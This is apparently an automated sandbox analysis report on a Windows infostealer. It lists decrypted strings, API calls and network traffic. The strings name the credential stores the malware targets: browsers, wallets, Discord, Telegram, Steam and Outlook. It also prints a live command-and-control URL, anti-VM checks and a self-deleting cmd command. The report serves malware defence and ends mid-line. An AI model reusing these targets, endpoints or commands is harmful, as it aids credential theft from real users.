Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: Local State
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: profiles.ini
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: chrome
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: opera
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: firefox
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: wallets
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: %08lX%04lX%lu
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: ProductName
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: x32
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: x64
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: %d/%d/%d %d:%d:%d
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: ProcessorNameString
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: DisplayName
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: DisplayVersion
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: Network Info:
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: - IP: IP?
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: - Country: ISO?
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: System Summary:
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: - HWID:
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: - OS:
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: - Architecture:
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: - UserName:
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: - Computer Name:
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: - Local Time:
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: - UTC:
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: - Language:
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: - Keyboards:
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: - Laptop:
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: - Running Path:
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: - CPU:
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: - Threads:
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: - Cores:
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: - RAM:
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: - Display Resolution:
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: - GPU:
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: User Agents:
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: Installed Apps:
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: All Users:
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: Current User:
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: Process List:
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: system_info.txt
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: freebl3.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: mozglue.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: msvcp140.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: nss3.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: softokn3.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: vcruntime140.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: \Temp\
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: .exe
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: runas
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: open
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: /c start
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: %DESKTOP%
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: %APPDATA%
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: %LOCALAPPDATA%
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: %USERPROFILE%
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: %DOCUMENTS%
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: %PROGRAMFILES%
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: %PROGRAMFILES_86%
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: %RECENT%
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: *.lnk
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: files
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: \discord\
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: \Local Storage\leveldb\CURRENT
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: \Local Storage\leveldb
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: \Telegram Desktop\
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: key_datas
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: D877F783D5D3EF8C*
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: map*
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: A7FDF864FBC10B77*
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: A92DAA6EA6F891F2*
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: F8806DD0C461824F*
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: Telegram
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: Tox
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: *.tox
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: *.ini
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: Password
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: 00000001
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: 00000002
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: 00000003
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: 00000004
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: \Outlook\accounts.txt
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: Pidgin
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: \.purple\
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: accounts.xml
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: dQw4w9WgXcQ
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: token:
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: Software\Valve\Steam
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: SteamPath
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: \config\
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: ssfn*
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: config.vdf
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: DialogConfig.vdf
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: DialogConfigOverlay*.vdf
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: libraryfolders.vdf
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: loginusers.vdf
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: \Steam\
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: sqlite3.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: browsers
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: done
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: soft
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: \Discord\tokens.txt
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: /c timeout /t 5 & del /f /q "
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: C:\Windows\system32\cmd.exe
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: https
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: POST
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: HTTP/1.1
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: Content-Disposition: form-data; name="
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: hwid
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: build
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: token
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: file_name
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: file
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: message
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: screenshot.jpg
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: INSERT_KEY_HERE
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetProcAddress
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: LoadLibraryA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: lstrcatA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: OpenEventA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: CreateEventA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: CloseHandle
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: Sleep
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetUserDefaultLangID
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: VirtualAllocExNuma
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: VirtualFree
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetSystemInfo
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: VirtualAlloc
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: HeapAlloc
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetComputerNameA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: lstrcpyA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetProcessHeap
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetCurrentProcess
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: lstrlenA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: ExitProcess
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GlobalMemoryStatusEx
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetSystemTime
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: SystemTimeToFileTime
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: advapi32.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: gdi32.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: user32.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: crypt32.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: ntdll.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetUserNameA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: CreateDCA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetDeviceCaps
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: ReleaseDC
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: CryptStringToBinaryA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: sscanf
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: VMwareVMware
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: HAL9TH
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: JohnDoe
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: DISPLAY
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: %hu/%hu/%hu
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: http://85.28.47.31
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: silence
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: /5499d72b3a3e55be.php
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: /8405906461a5200c/
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: sila
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetEnvironmentVariableA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetFileAttributesA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GlobalLock
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: HeapFree
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetFileSize
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GlobalSize
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: CreateToolhelp32Snapshot
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: IsWow64Process
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: Process32Next
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetLocalTime
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: FreeLibrary
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetTimeZoneInformation
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetSystemPowerStatus
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetVolumeInformationA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetWindowsDirectoryA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: Process32First
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetLocaleInfoA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetUserDefaultLocaleName
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetModuleFileNameA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: DeleteFileA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: FindNextFileA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: LocalFree
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: FindClose
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: SetEnvironmentVariableA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: LocalAlloc
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetFileSizeEx
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: ReadFile
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: SetFilePointer
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: WriteFile
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: CreateFileA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: FindFirstFileA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: CopyFileA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: VirtualProtect
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetLastError
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: lstrcpynA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: MultiByteToWideChar
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GlobalFree
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: WideCharToMultiByte
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GlobalAlloc
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: OpenProcess
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: TerminateProcess
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetCurrentProcessId
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: gdiplus.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: ole32.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: bcrypt.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: wininet.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: shlwapi.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: shell32.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: psapi.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: rstrtmgr.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: CreateCompatibleBitmap
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: SelectObject
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: BitBlt
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: DeleteObject
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: CreateCompatibleDC
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GdipGetImageEncodersSize
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GdipGetImageEncoders
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GdipCreateBitmapFromHBITMAP
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GdiplusStartup
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GdiplusShutdown
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GdipSaveImageToStream
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GdipDisposeImage
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GdipFree
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetHGlobalFromStream
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: CreateStreamOnHGlobal
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: CoUninitialize
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: CoInitialize
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: CoCreateInstance
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: BCryptGenerateSymmetricKey
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: BCryptCloseAlgorithmProvider
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: BCryptDecrypt
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: BCryptSetProperty
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: BCryptDestroyKey
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: BCryptOpenAlgorithmProvider
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetWindowRect
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetDesktopWindow
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetDC
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: CloseWindow
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: wsprintfA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: EnumDisplayDevicesA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetKeyboardLayoutList
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: CharToOemW
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: wsprintfW
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: RegQueryValueExA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: RegEnumKeyExA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: RegOpenKeyExA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: RegCloseKey
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: RegEnumValueA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: CryptBinaryToStringA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: CryptUnprotectData
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: SHGetFolderPathA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: ShellExecuteExA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: InternetOpenUrlA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: InternetConnectA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: InternetCloseHandle
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: InternetOpenA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: HttpSendRequestA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: HttpOpenRequestA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: InternetReadFile
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: InternetCrackUrlA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: StrCmpCA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: StrStrA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: StrCmpCW
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00409BB0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree, 0_2_00409BB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00418940 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA, 0_2_00418940
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040C660 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat, 0_2_0040C660
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00407280 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree, 0_2_00407280
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00409B10 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 0_2_00409B10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6E6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6C6E6C80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C83A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util, 0_2_6C83A9A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C8344C0 PK11_PubEncrypt, 0_2_6C8344C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C804420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free, 0_2_6C804420
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C834440 PK11_PrivDecrypt, 0_2_6C834440
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C8825B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt, 0_2_6C8825B0

Compliance

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Unpacked PE file: 22.2.ba77748b9b.exe.400000.0.unpack
Source: C:\Users\user\1000003002\ead6a72944.exe Unpacked PE file: 28.2.ead6a72944.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Unpacked PE file: 46.2.ba77748b9b.exe.400000.0.unpack
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61271 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61274 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61283 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61289 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61293 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61295 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61299 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61302 version: TLS 1.2
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2441623343.000000006C74D000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb61252224y source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: kf5nnj6lqkqsr=IsoWRKeOa8NsT%2FySFnivv8d%2FUT%2BPShDyrbUKZ%2BFrcmUbempXtmTRVghRPnUtoJ3%2B8V7a63iBYUxISc7YAhztHQ%3D%3D\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.inisP~ source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbes source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb831BSOFTWARE\WOW6432Node\Valve\Steams source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: build2.exe, 0000002C.00000002.3065381905.000001F170826000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063680446.000001F16FC28000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3076823930.000001F171E22000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3071018908.000001F171228000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063906502.000001F16FE22000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3075774507.000001F171A2F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3062001048.000001F16F628000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3077144572.000001F172028000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 